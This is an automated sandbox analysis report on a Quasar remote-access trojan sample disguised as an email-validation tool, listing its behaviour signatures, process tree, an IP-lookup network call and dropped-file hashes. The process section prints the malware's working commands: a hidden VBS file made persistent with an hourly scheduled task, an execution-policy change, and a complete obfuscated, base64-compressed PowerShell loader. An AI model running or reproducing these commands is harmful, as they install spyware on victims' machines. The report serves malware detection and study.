Malware Analysis Report

2025-01-18 04:28

Sample ID 231202-r4madade77
Target debouncer_BulkValidEmail.bin
SHA256 575219def0a2cebd86b9123bb384d394e1940b38ba3c9a8af40dd49c6a12b4db
Tags
upx quasar office04 spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

575219def0a2cebd86b9123bb384d394e1940b38ba3c9a8af40dd49c6a12b4db

Threat Level: Known bad

The file debouncer_BulkValidEmail.bin was found to be: Known bad.

Malicious Activity Summary

upx quasar office04 spyware trojan

Quasar RAT

Quasar payload

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Looks up external IP address via web service

Suspicious use of SetThreadContext

Unsigned PE

Program crash

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Views/modifies file attributes

Creates scheduled task(s)

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-02 14:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-02 14:44

Reported

2023-12-02 14:46

Platform

win7-20231025-en

Max time kernel

40s

Max time network

18s

Command Line

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ifconfig.me N/A N/A
N/A ifconfig.me N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2340 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe
PID 2340 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe
PID 2340 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe
PID 2504 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2988 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2988 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2988 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2504 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 332 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 332 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 332 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2504 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 1584 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1584 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1584 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1584 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1588 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1588 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1588 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1588 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2024 wrote to memory of 1792 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2024 wrote to memory of 1792 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2024 wrote to memory of 1792 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2024 wrote to memory of 1792 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2504 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe

"C:\Users\Admin\AppData\Local\Temp\debouncer_BulkValidEmail.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs""

C:\Windows\system32\attrib.exe

attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs" > NUL 2>&1"

C:\Windows\system32\schtasks.exe

schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "cmd /C echo Y|powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '...') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser

C:\Windows\system32\cmd.exe

cmd /C echo Y

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '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') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rjppa7oq.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

Network

Country Destination Domain Proto
US 8.8.8.8:53 ifconfig.me udp
US 34.117.118.44:443 ifconfig.me tcp

Files

memory/2340-0-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2340-1-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2340-2-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2340-3-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2340-76-0x0000000003DD0000-0x000000000441E000-memory.dmp

memory/2504-77-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-78-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-79-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

memory/2504-80-0x000000013F5B0000-0x000000013FBFE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI23402\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

\Users\Admin\AppData\Local\Temp\_MEI23402\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-localization-l1-2-0.dll

MD5 54d2f426bc91ecf321908d133b069b20
SHA1 78892ea2873091f016daa87d2c0070b6c917131f
SHA256 646b28a20208be68439d73efa21be59e12ed0a5fe9e63e5d3057ca7b84bc6641
SHA512 6b1b095d5e3cc3d5909ebda4846568234b9bc43784919731dd906b6fa62aa1fdf723ac0d18bca75d74616e2c54c82d1402cc8529d75cb1d7744f91622ac4ec06

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-processthreads-l1-1-1.dll

MD5 d1b3cc23127884d9eff1940f5b98e7aa
SHA1 d1b108e9fce8fba1c648afaad458050165502878
SHA256 51a73fbfa2afe5e45962031618ec347aaa0857b11f3cf273f4c218354bfe70cb
SHA512 ee5e0d546190e8ba9884ab887d11bb18fc71d3878983b544cd9ab80b6dd18ad65e66fe49fe0f4b92cbc51992fb1c39de091cf789159625341a03f4911b968fa2

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-localization-l1-2-0.dll

MD5 54d2f426bc91ecf321908d133b069b20
SHA1 78892ea2873091f016daa87d2c0070b6c917131f
SHA256 646b28a20208be68439d73efa21be59e12ed0a5fe9e63e5d3057ca7b84bc6641
SHA512 6b1b095d5e3cc3d5909ebda4846568234b9bc43784919731dd906b6fa62aa1fdf723ac0d18bca75d74616e2c54c82d1402cc8529d75cb1d7744f91622ac4ec06

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-file-l1-2-0.dll

MD5 b5060343583e6be3b3de33ccd40398e0
SHA1 5b33b8db5d6cfb0e8a5bb7f209df2c6191b02edb
SHA256 27878021c6d48fb669f1822821b5934f5a2904740bebb340b6849e7635490cb7
SHA512 86610edc05aa1b756c87160f9eefe9365e3f712c5bed18c8feca3cae12aef07ccc44c45c4be19dc8f9d337a6f6709b260c89019a5efcfe9fa0847d85ab64d282

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-file-l1-2-0.dll

MD5 b5060343583e6be3b3de33ccd40398e0
SHA1 5b33b8db5d6cfb0e8a5bb7f209df2c6191b02edb
SHA256 27878021c6d48fb669f1822821b5934f5a2904740bebb340b6849e7635490cb7
SHA512 86610edc05aa1b756c87160f9eefe9365e3f712c5bed18c8feca3cae12aef07ccc44c45c4be19dc8f9d337a6f6709b260c89019a5efcfe9fa0847d85ab64d282

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-file-l2-1-0.dll

MD5 2e8995e2320e313545c3ddb5c71dc232
SHA1 45d079a704bec060a15f8eba3eab22ac5cf756c6
SHA256 c55eb043454ac2d460f86ea26f934ecb16bdb1d05294c168193a05090bf1c56c
SHA512 19adcc5dd98f30b4eebefe344e1939c93c284c802043ea3ac22654cf2e23692f868a00a482c9be1b1e88089a5031fa81a3f1165175224309828bd28ee12f2d49

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-file-l2-1-0.dll

MD5 2e8995e2320e313545c3ddb5c71dc232
SHA1 45d079a704bec060a15f8eba3eab22ac5cf756c6
SHA256 c55eb043454ac2d460f86ea26f934ecb16bdb1d05294c168193a05090bf1c56c
SHA512 19adcc5dd98f30b4eebefe344e1939c93c284c802043ea3ac22654cf2e23692f868a00a482c9be1b1e88089a5031fa81a3f1165175224309828bd28ee12f2d49

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-timezone-l1-1-0.dll

MD5 36165a5050672b7b0e04cb1f3d7b1b8f
SHA1 ef17c4622f41ef217a16078e8135acd4e2cf9443
SHA256 d7ab47157bff1b2347e7ae945517b4fc256425939ba7b6288ff85a51931568a7
SHA512 da360ff716bb66dd1adb5d86866b4b81b08a6fe86362fded05430f833a96934ccdada1b3081b55766a4a30c16d0d62aa1715b8839ea5c405a40d9911715dae68

C:\Users\Admin\AppData\Local\Temp\_MEI23402\python38.dll

MD5 687bac86f9a2330d898903ee91d332d7
SHA1 af40c22b253a130ae0ef0300c746faa8ff3e52b8
SHA256 72793448d6feba5b6a07053d39474c239b0932a867580ac7c3fc2aa417b4eacf
SHA512 d471f0212089b94d9d70852ff398e7a3241c1c6680f2b5fffdb9756182184a4bab4f52d21ab511512b3658306e44a6dc924b4bd64b8b2b6cdbf546e07b936135

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-timezone-l1-1-0.dll

MD5 36165a5050672b7b0e04cb1f3d7b1b8f
SHA1 ef17c4622f41ef217a16078e8135acd4e2cf9443
SHA256 d7ab47157bff1b2347e7ae945517b4fc256425939ba7b6288ff85a51931568a7
SHA512 da360ff716bb66dd1adb5d86866b4b81b08a6fe86362fded05430f833a96934ccdada1b3081b55766a4a30c16d0d62aa1715b8839ea5c405a40d9911715dae68

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-core-processthreads-l1-1-1.dll

MD5 d1b3cc23127884d9eff1940f5b98e7aa
SHA1 d1b108e9fce8fba1c648afaad458050165502878
SHA256 51a73fbfa2afe5e45962031618ec347aaa0857b11f3cf273f4c218354bfe70cb
SHA512 ee5e0d546190e8ba9884ab887d11bb18fc71d3878983b544cd9ab80b6dd18ad65e66fe49fe0f4b92cbc51992fb1c39de091cf789159625341a03f4911b968fa2

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-conio-l1-1-0.dll

MD5 75e626c3ebf160ebe75c59d3d6ac3739
SHA1 02a99199f160020b1086cec6c6a2983908641b65
SHA256 762ca8dd14f8ff603d06811ba904c973a684022202476bca45e9dc1345151ac4
SHA512 5ad205b90ac1658c5b07f6f212a82be8792999b68f9c9617a1298b04d83e7fcb9887ed307a9d31517bcba703b3ee6699ea93f67b06629355ea6519fed0a6d29a

\Users\Admin\AppData\Local\Temp\_MEI23402\python38.dll

MD5 687bac86f9a2330d898903ee91d332d7
SHA1 af40c22b253a130ae0ef0300c746faa8ff3e52b8
SHA256 72793448d6feba5b6a07053d39474c239b0932a867580ac7c3fc2aa417b4eacf
SHA512 d471f0212089b94d9d70852ff398e7a3241c1c6680f2b5fffdb9756182184a4bab4f52d21ab511512b3658306e44a6dc924b4bd64b8b2b6cdbf546e07b936135

memory/2504-98-0x000007FEF5FD0000-0x000007FEF6412000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-convert-l1-1-0.dll

MD5 0485c463cd8d2ae1cbd42df6f0591246
SHA1 ea634140905078e8f687a031ae919cff23c27e6f
SHA256 983f4d4c7b7330e7f5f091080c1e81905575ebccd97e11dff8a064979ec8d9b8
SHA512 ddf947a1b86c3826859570a3e1d59e4ec4564cfcf25c84841383a4b5f5ad6c2fe618078416aed201fb744d5fbd6c39dab7c1e964dd5e148da018a825fcc0044a

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-locale-l1-1-0.dll

MD5 ba17b278fff2c18e34e47562ddde8166
SHA1 bed762d11b98737fcf1d1713d77345ec4780a8c2
SHA256 c36f5c0ac5d91a8417866dd4d8c670c2192ba83364693e7438282fb8678c3d1e
SHA512 72516b81606ccf836549c053325368e93264fdebc7092e42e3df849a16ccefa81b7156ae5609e227faa7c9c1bf9d68b2ac349791a839f4575728f350dd048f27

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-locale-l1-1-0.dll

MD5 ba17b278fff2c18e34e47562ddde8166
SHA1 bed762d11b98737fcf1d1713d77345ec4780a8c2
SHA256 c36f5c0ac5d91a8417866dd4d8c670c2192ba83364693e7438282fb8678c3d1e
SHA512 72516b81606ccf836549c053325368e93264fdebc7092e42e3df849a16ccefa81b7156ae5609e227faa7c9c1bf9d68b2ac349791a839f4575728f350dd048f27

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-heap-l1-1-0.dll

MD5 a22f9a4cbd701209842b204895fedf37
SHA1 72fa50160baf1f2ea2adcff58f3f90a77a59d949
SHA256 2ee3d52640d84ac4f7f7ddfe748f51baa6fd0d492286c781251222420e85ca97
SHA512 903755d4fa6651669295a10e66be8ea223cd8d5ad60ebe06188d8b779fef7e964d0aa26dc5479f14aab655562d3c1ef76b86790fb97f991eaf52da0f70e40529

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-heap-l1-1-0.dll

MD5 a22f9a4cbd701209842b204895fedf37
SHA1 72fa50160baf1f2ea2adcff58f3f90a77a59d949
SHA256 2ee3d52640d84ac4f7f7ddfe748f51baa6fd0d492286c781251222420e85ca97
SHA512 903755d4fa6651669295a10e66be8ea223cd8d5ad60ebe06188d8b779fef7e964d0aa26dc5479f14aab655562d3c1ef76b86790fb97f991eaf52da0f70e40529

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 1193f810519fbc07beb3ffbad3247fc4
SHA1 db099628a19b2d34e89028c2e16bc89df28ed78f
SHA256 ab2158fe6b354fb429f57f374ca25105b44e97edcbdc1b752650d895dadd6fd1
SHA512 3222a10c3be5098aca0211015efe75cfbcd408fd28315acedd016d8f77513f81e207536b072001525965635da39c4aae8ef9f6ad367f5d695de67b1614179353

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 1193f810519fbc07beb3ffbad3247fc4
SHA1 db099628a19b2d34e89028c2e16bc89df28ed78f
SHA256 ab2158fe6b354fb429f57f374ca25105b44e97edcbdc1b752650d895dadd6fd1
SHA512 3222a10c3be5098aca0211015efe75cfbcd408fd28315acedd016d8f77513f81e207536b072001525965635da39c4aae8ef9f6ad367f5d695de67b1614179353

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-environment-l1-1-0.dll

MD5 e48a1860000fd2bd61566e76093984f5
SHA1 aa3f233fb19c9e7c88d4307bade2a6eef6518a8a
SHA256 67bbb287b2e9057bf8b412ad2faa266321ac28c6e6ba5f22169e2517a3ead248
SHA512 46b384c45d2fe2b70a5ac8ee087ba55828a62ccab876a21a3abd531d4de5ec7be21ff34b2284e0231b6cf0869eba09599c3b403db84448f20bd0fff88c1956d5

C:\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-environment-l1-1-0.dll

MD5 e48a1860000fd2bd61566e76093984f5
SHA1 aa3f233fb19c9e7c88d4307bade2a6eef6518a8a
SHA256 67bbb287b2e9057bf8b412ad2faa266321ac28c6e6ba5f22169e2517a3ead248
SHA512 46b384c45d2fe2b70a5ac8ee087ba55828a62ccab876a21a3abd531d4de5ec7be21ff34b2284e0231b6cf0869eba09599c3b403db84448f20bd0fff88c1956d5

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-convert-l1-1-0.dll

MD5 0485c463cd8d2ae1cbd42df6f0591246
SHA1 ea634140905078e8f687a031ae919cff23c27e6f
SHA256 983f4d4c7b7330e7f5f091080c1e81905575ebccd97e11dff8a064979ec8d9b8
SHA512 ddf947a1b86c3826859570a3e1d59e4ec4564cfcf25c84841383a4b5f5ad6c2fe618078416aed201fb744d5fbd6c39dab7c1e964dd5e148da018a825fcc0044a

\Users\Admin\AppData\Local\Temp\_MEI23402\api-ms-win-crt-conio-l1-1-0.dll

MD5 75e626c3ebf160ebe75c59d3d6ac3739
SHA1 02a99199f160020b1086cec6c6a2983908641b65
SHA256 762ca8dd14f8ff603d06811ba904c973a684022202476bca45e9dc1345151ac4
SHA512 5ad205b90ac1658c5b07f6f212a82be8792999b68f9c9617a1298b04d83e7fcb9887ed307a9d31517bcba703b3ee6699ea93f67b06629355ea6519fed0a6d29a

